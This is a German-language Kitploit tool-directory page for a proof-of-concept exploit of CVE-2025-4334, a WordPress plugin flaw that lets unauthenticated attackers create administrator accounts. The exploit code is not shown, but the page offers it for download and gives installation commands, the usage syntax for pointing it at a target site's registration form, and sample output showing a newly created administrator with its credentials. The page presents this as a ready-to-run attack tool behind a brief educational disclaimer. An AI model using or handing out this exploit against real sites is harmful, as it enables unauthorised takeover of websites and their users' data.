Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-4334 — Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts. | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts.

Repository anzeigen
4vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WordPress Logo

CVE-2025-4334 - Simple User Registration <= 6.3 Nicht authentifizierte Privilegieneskalation

Exploit-Titel: Simple User Registration <= 6.3 – Nicht authentifizierte Privilegieneskalation
Autor: Gaurav Bhattacharjee (0xgh057r3c0n)
CVE-ID: CVE-2025-4334

Dieser Exploit zielt auf eine Schwachstelle im Simple User Registration Plugin für WordPress (<= v6.3) ab, die es nicht authentifizierten Angreifern ermöglicht, Privilegien zu erweitern und ein neues Administratorkonto zu erstellen.


⚙️ Installation

Klone das Repository und installiere die erforderlichen Python-Abhängigkeiten:

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

Abhängigkeiten:

  • requests
  • colorama

🚀 Verwendung

root@kitploit:~
python3 CVE-2025-4334.py -u <base_url> --form <form_url>

Argumente:

  • -u / --url → Basis-WordPress-URL (z.B. https://target.com/wordpress/)
  • --form → Vollständige URL des Registrierungsformulars (z.B. https://target.com/wpr/default-registration/)

Beispiel:

root@kitploit:~
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 Beispielausgabe

root@kitploit:~
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Die unbefugte Nutzung gegen Systeme ohne Erlaubnis ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.


📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert.


Tool herunterladen